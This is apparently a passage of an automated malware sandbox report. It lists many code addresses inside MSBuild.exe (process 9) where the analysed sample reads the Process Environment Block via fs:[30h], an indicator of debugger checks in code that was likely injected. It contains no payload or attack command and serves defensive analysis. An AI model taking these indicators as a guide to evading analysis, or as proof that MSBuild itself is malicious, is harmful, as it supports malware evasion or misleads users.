Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov eax, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov eax, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov eax, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov ecx, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov eax, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE035C mov eax, dword ptr fs:[00000030h]	9_2_01AE035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B3634F mov eax, dword ptr fs:[00000030h]	9_2_01B3634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A702A0 mov eax, dword ptr fs:[00000030h]	9_2_01A702A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A702A0 mov eax, dword ptr fs:[00000030h]	9_2_01A702A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov ecx, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF62A0 mov eax, dword ptr fs:[00000030h]	9_2_01AF62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE0283 mov eax, dword ptr fs:[00000030h]	9_2_01AE0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE0283 mov eax, dword ptr fs:[00000030h]	9_2_01AE0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE0283 mov eax, dword ptr fs:[00000030h]	9_2_01AE0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E284 mov eax, dword ptr fs:[00000030h]	9_2_01A9E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E284 mov eax, dword ptr fs:[00000030h]	9_2_01A9E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A702E1 mov eax, dword ptr fs:[00000030h]	9_2_01A702E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A702E1 mov eax, dword ptr fs:[00000030h]	9_2_01A702E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A702E1 mov eax, dword ptr fs:[00000030h]	9_2_01A702E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A6A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A6A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A6A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A6A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A2C3 mov eax, dword ptr fs:[00000030h]	9_2_01A6A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B362D6 mov eax, dword ptr fs:[00000030h]	9_2_01B362D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5823B mov eax, dword ptr fs:[00000030h]	9_2_01A5823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274 mov eax, dword ptr fs:[00000030h]	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A64260 mov eax, dword ptr fs:[00000030h]	9_2_01A64260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A64260 mov eax, dword ptr fs:[00000030h]	9_2_01A64260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A64260 mov eax, dword ptr fs:[00000030h]	9_2_01A64260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5826B mov eax, dword ptr fs:[00000030h]	9_2_01A5826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1A250 mov eax, dword ptr fs:[00000030h]	9_2_01B1A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1A250 mov eax, dword ptr fs:[00000030h]	9_2_01B1A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE8243 mov eax, dword ptr fs:[00000030h]	9_2_01AE8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE8243 mov ecx, dword ptr fs:[00000030h]	9_2_01AE8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B3625D mov eax, dword ptr fs:[00000030h]	9_2_01B3625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A250 mov eax, dword ptr fs:[00000030h]	9_2_01A5A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A66259 mov eax, dword ptr fs:[00000030h]	9_2_01A66259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AE05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AE05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE05A7 mov eax, dword ptr fs:[00000030h]	9_2_01AE05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A845B1 mov eax, dword ptr fs:[00000030h]	9_2_01A845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A845B1 mov eax, dword ptr fs:[00000030h]	9_2_01A845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A94588 mov eax, dword ptr fs:[00000030h]	9_2_01A94588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A62582 mov eax, dword ptr fs:[00000030h]	9_2_01A62582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A62582 mov ecx, dword ptr fs:[00000030h]	9_2_01A62582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E59C mov eax, dword ptr fs:[00000030h]	9_2_01A9E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9C5ED mov eax, dword ptr fs:[00000030h]	9_2_01A9C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9C5ED mov eax, dword ptr fs:[00000030h]	9_2_01A9C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A625E0 mov eax, dword ptr fs:[00000030h]	9_2_01A625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A8E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E5CF mov eax, dword ptr fs:[00000030h]	9_2_01A9E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E5CF mov eax, dword ptr fs:[00000030h]	9_2_01A9E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A665D0 mov eax, dword ptr fs:[00000030h]	9_2_01A665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A5D0 mov eax, dword ptr fs:[00000030h]	9_2_01A9A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A5D0 mov eax, dword ptr fs:[00000030h]	9_2_01A9A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535 mov eax, dword ptr fs:[00000030h]	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E53E mov eax, dword ptr fs:[00000030h]	9_2_01A8E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E53E mov eax, dword ptr fs:[00000030h]	9_2_01A8E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E53E mov eax, dword ptr fs:[00000030h]	9_2_01A8E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E53E mov eax, dword ptr fs:[00000030h]	9_2_01A8E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8E53E mov eax, dword ptr fs:[00000030h]	9_2_01A8E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF6500 mov eax, dword ptr fs:[00000030h]	9_2_01AF6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34500 mov eax, dword ptr fs:[00000030h]	9_2_01B34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9656A mov eax, dword ptr fs:[00000030h]	9_2_01A9656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9656A mov eax, dword ptr fs:[00000030h]	9_2_01A9656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9656A mov eax, dword ptr fs:[00000030h]	9_2_01A9656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A68550 mov eax, dword ptr fs:[00000030h]	9_2_01A68550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A68550 mov eax, dword ptr fs:[00000030h]	9_2_01A68550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A664AB mov eax, dword ptr fs:[00000030h]	9_2_01A664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A944B0 mov ecx, dword ptr fs:[00000030h]	9_2_01A944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AEA4B0 mov eax, dword ptr fs:[00000030h]	9_2_01AEA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1A49A mov eax, dword ptr fs:[00000030h]	9_2_01B1A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A604E5 mov ecx, dword ptr fs:[00000030h]	9_2_01A604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5C427 mov eax, dword ptr fs:[00000030h]	9_2_01A5C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E420 mov eax, dword ptr fs:[00000030h]	9_2_01A5E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E420 mov eax, dword ptr fs:[00000030h]	9_2_01A5E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E420 mov eax, dword ptr fs:[00000030h]	9_2_01A5E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6420 mov eax, dword ptr fs:[00000030h]	9_2_01AE6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A430 mov eax, dword ptr fs:[00000030h]	9_2_01A9A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A98402 mov eax, dword ptr fs:[00000030h]	9_2_01A98402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A98402 mov eax, dword ptr fs:[00000030h]	9_2_01A98402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A98402 mov eax, dword ptr fs:[00000030h]	9_2_01A98402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AEC460 mov ecx, dword ptr fs:[00000030h]	9_2_01AEC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8A470 mov eax, dword ptr fs:[00000030h]	9_2_01A8A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8A470 mov eax, dword ptr fs:[00000030h]	9_2_01A8A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8A470 mov eax, dword ptr fs:[00000030h]	9_2_01A8A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1A456 mov eax, dword ptr fs:[00000030h]	9_2_01B1A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E443 mov eax, dword ptr fs:[00000030h]	9_2_01A9E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8245A mov eax, dword ptr fs:[00000030h]	9_2_01A8245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5645D mov eax, dword ptr fs:[00000030h]	9_2_01A5645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A607AF mov eax, dword ptr fs:[00000030h]	9_2_01A607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B147A0 mov eax, dword ptr fs:[00000030h]	9_2_01B147A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0678E mov eax, dword ptr fs:[00000030h]	9_2_01B0678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A827ED mov eax, dword ptr fs:[00000030h]	9_2_01A827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A827ED mov eax, dword ptr fs:[00000030h]	9_2_01A827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A827ED mov eax, dword ptr fs:[00000030h]	9_2_01A827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AEE7E1 mov eax, dword ptr fs:[00000030h]	9_2_01AEE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A647FB mov eax, dword ptr fs:[00000030h]	9_2_01A647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A647FB mov eax, dword ptr fs:[00000030h]	9_2_01A647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6C7C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE07C3 mov eax, dword ptr fs:[00000030h]	9_2_01AE07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9C720 mov eax, dword ptr fs:[00000030h]	9_2_01A9C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9C720 mov eax, dword ptr fs:[00000030h]	9_2_01A9C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9273C mov eax, dword ptr fs:[00000030h]	9_2_01A9273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9273C mov ecx, dword ptr fs:[00000030h]	9_2_01A9273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9273C mov eax, dword ptr fs:[00000030h]	9_2_01A9273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADC730 mov eax, dword ptr fs:[00000030h]	9_2_01ADC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9C700 mov eax, dword ptr fs:[00000030h]	9_2_01A9C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A60710 mov eax, dword ptr fs:[00000030h]	9_2_01A60710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A90710 mov eax, dword ptr fs:[00000030h]	9_2_01A90710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A68770 mov eax, dword ptr fs:[00000030h]	9_2_01A68770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770 mov eax, dword ptr fs:[00000030h]	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9674D mov esi, dword ptr fs:[00000030h]	9_2_01A9674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9674D mov eax, dword ptr fs:[00000030h]	9_2_01A9674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9674D mov eax, dword ptr fs:[00000030h]	9_2_01A9674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AEE75D mov eax, dword ptr fs:[00000030h]	9_2_01AEE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A60750 mov eax, dword ptr fs:[00000030h]	9_2_01A60750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2750 mov eax, dword ptr fs:[00000030h]	9_2_01AA2750
